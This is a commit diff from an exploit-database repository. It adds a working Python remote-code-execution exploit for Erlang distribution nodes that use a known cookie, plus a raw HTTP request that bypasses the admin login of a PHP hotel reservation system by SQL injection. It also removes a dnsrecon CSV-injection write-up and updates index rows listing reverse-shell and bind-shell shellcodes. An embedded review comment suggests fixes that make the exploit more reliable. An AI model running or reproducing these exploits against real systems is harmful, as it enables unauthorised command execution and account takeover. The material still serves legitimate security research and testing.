DB: 2021-01-14
4 changes to exploits/shellcodes dnsrecon 0.10.0 - CSV Injection Erlang Cookie - Remote Code Execution Online Hotel Reservation System 1.0 - Admin Authentication Bypass Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes) Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes) Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)
This commit is contained in:
parent
91f4f8025d
commit
f8d41df29f
5 changed files with 88 additions and 41 deletions
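--- a/exploits/multiple/remote/49418.py
+++ b/exploits/multiple/remote/49418.py
@@ -0,0 +1,67 @@
+# Exploit Title: Erlang Cookie - Remote Code Execution
+# Date: 2020-05-04
+# Exploit Author: 1F98D
+# Original Author: Milton Valencia (wetw0rk)
+# Software Link: https://www.erlang.org/
+# Version: N/A
+# Tested on: Debian 9.11 (x64)
+# References:
+# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+#
+# Erlang allows distributed Erlang instances to connect and remotely execute commands.
+# Nodes are permitted to connect to eachother if they share an authentication cookie,
+# this cookie is commonly called ".erlang.cookie"
+#
+#!/usr/local/bin/python3
+
+import socket
+from hashlib import md5
+import struct
+import sys
+
+TARGET = "192.168.1.1"
+PORT = 25672
+COOKIE = "XXXXXXXXXXXXXXXXXXXX"
+CMD = "whoami"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TARGET, PORT))
+
+name_msg = b"\x00"
+name_msg += b"\x15"
+name_msg += b"n"
+name_msg += b"\x00\x07"
+name_msg += b"\x00\x03\x49\x9c"
+name_msg += b"AAAAAA@AAAAAAA"
+
+s.send(name_msg)
+s.recv(5) # Receive "ok" message
+challenge = s.recv(1024) # Receive "challenge" message
+challenge = struct.unpack(">I", challenge[9:13])[0]
+
+print("Extracted challenge: {}".format(challenge))
+
+challenge_reply = b"\x00\x15"
+challenge_reply += b"r"
+challenge_reply += b"\x01\x02\x03\x04"
+challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
+
+s.send(challenge_reply)
+challenge_res = s.recv(1024)
+if len(challenge_res) == 0:
+print("Authentication failed, exiting")
+sys.exit(1)
+
+print("Authentication successful")
+
+ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
+msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
+msg += struct.pack(">H", len(CMD))
+msg += bytes(CMD, 'ascii')
+msg += b'jw\x04user'
+
+payload = b'\x70' + ctrl + msg
+payload = struct.pack('!I', len(payload)) + payload
+print("Sending cmd: '{}'".format(CMD))
+s.send(payload)
+print(s.recv(1024))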
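Review bot: The `#!/usr/local/bin/python3` line sits at line 15 of the new file, after the comment header, where the kernel never reads it; move it to the first line or drop it, because in its current position it is inert. `challenge[9:13]` is unpacked with `struct.unpack(">I", …)` straight out of a single `s.recv(1024)`, so a short or partial read raises `struct.error` instead of a readable message; a guard such as `if len(challenge) < 13: sys.exit("Unexpected challenge message, exiting")` before the unpack would make that failure explicit. The three `s.send(...)` calls should be `s.sendall(...)`, since `send` may write only part of a buffer, and the socket is never closed; opening it with `with socket.create_connection((TARGET, PORT)) as s:` would cover both the connect and the close. As rendered here the two lines after `if len(challenge_res) == 0:` carry no indentation; if the committed file is the same, `sys.exit(1)` runs unconditionally, so the indentation of that branch should be confirmed.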
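--- a/exploits/php/webapps/49420.txt
+++ b/exploits/php/webapps/49420.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass
+# Exploit Author: Richard Jones
+# Date: 2021-01-13
+# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+#Exploit URL: http://TARGET/marimar/admin/index.php
+Host: TARGET
+POST /marimar/admin/login.php HTTP/1.1
+Content-Length: 57
+Connection: close
+Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616
+
+email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=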
|
@ -1,37 +0,0 @@
|
|||
# Exploit Title: dnsrecon 0.10.0 - CSV Injection
|
||||
# Author: Dolev Farhi
|
||||
# Date: 2021-01-07
|
||||
# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
|
||||
# Version : 0.10.0
|
||||
# Tested on: ParrotOS 4.10
|
||||
|
||||
dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
|
||||
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:
|
||||
|
||||
_spf.example.com "test',=1+1337,'z"
|
||||
|
||||
|
||||
user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
|
||||
[*] Performing General Enumeration of Domain: _spf.example.com
|
||||
[-] DNSSEC is not configured for _spf.example.com
|
||||
[*] SOA ns-59.awsdns-07.com 205.1.1.1
|
||||
[-] Could not Resolve NS Records for _spf.example.com
|
||||
[-] Could not Resolve MX Records for _spf.example.com
|
||||
[*] TXT _spf.example.com test',=1+1337,'z
|
||||
[*] Enumerating SRV Records
|
||||
[+] 0 Records Found
|
||||
[*] Saving records to CSV file: ./file.csv
|
||||
{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
|
||||
{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}
|
||||
|
||||
|
||||
This output will then be rewritten into a CSV with this structure:
|
||||
|
||||
Type,Name,Address,Target,Port,String
|
||||
SOA,ns-59.awsdns-07.com,205.1.1.1
|
||||
TXT,_spf.example.com,,,,'test',=1+1337,'z'
|
||||
|
||||
The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464:
|
||||
|
||||
Attribute Values
|
||||
All printable ASCII characters are permitted in the attribute value.
|
|
@ -11243,7 +11243,6 @@ id,file,description,date,author,type,platform,port
|
|||
49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,
|
||||
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
|
||||
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
|
||||
49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python,
|
||||
49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
|
@ -18355,6 +18354,7 @@ id,file,description,date,author,type,platform,port
|
|||
49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
|
||||
49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
|
||||
49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
|
||||
49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -43619,3 +43619,4 @@ id,file,description,date,author,type,platform,port
|
|||
49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php,
|
||||
49413,exploits/php/webapps/49413.txt,"Cemetry Mapping and Information System 1.0 - Multiple SQL Injections",2021-01-12,"Mesut Cetin",webapps,php,
|
||||
49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,
|
||||
49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,
|
||||
|
|
|
|
@ -1005,10 +1005,10 @@ id,file,description,date,author,type,platform
|
|||
47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86
|
||||
47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86
|
||||
47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86
|
||||
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
|
||||
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
|
||||
47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86
|
||||
47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86
|
||||
47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
|
||||
|
@ -1025,4 +1025,4 @@ id,file,description,date,author,type,platform
|
|||
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
|
||||
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
|
||||
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
|
||||
49416,shellcodes/linux/49416.txt,"Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
|
||||
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
|
||||
|
|
|